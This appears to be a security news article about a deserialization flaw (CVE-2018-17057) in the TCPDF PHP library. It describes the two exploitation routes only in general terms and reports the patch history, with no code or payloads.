According to the ethical hacker, the vulnerability could be exploited by malicious users to perform a remote code execution on web pages and applications that use this library; then attackers could execute malicious code and take control over the compromised systems.
This vulnerability could be said to be a variant of a previous discovery. The original vulnerability was found by the ethical hacker Sam Thomas, who designed an experiment able to demonstrate a deserialization vulnerability that impacted PHP applications about a year ago.
According to reports, the new vulnerability variant can be exploited in two ways:
- When websites allow user information to be part of the PDF file generation process
- When websites have XSS vulnerabilities, where an attacker is able to inject malicious code into the HTML source code that will be sent to the TCPDF library to be converted to PDF
The attack process is truly complex and requires advanced coding knowledge to exploit the vulnerability. According to experts, a deserialization exploit is very difficult to find and can bring catastrophic consequences for programming languages like Ruby, Java and PHP.
TCPDF developers were informed about the vulnerability (tracked as CVE-2018-17057) since August last year. A month later, TCPDF 6.2.20 was launched to correct the reported errors. However, it is recommended that users update to the 6.2.22 version, because the fixes were disabled when they tried to fix diferent vulnerability.
TCPDF is one of the most popular PHP libraries nowadays, being used by multiple independent website operators, content management systems, intranets, web applications related to PDF files, among other uses.
This is a new sign that vulnerability patching is not a simple task; in some cases it may be necessary to rewrite large strings of code, not just some fragments.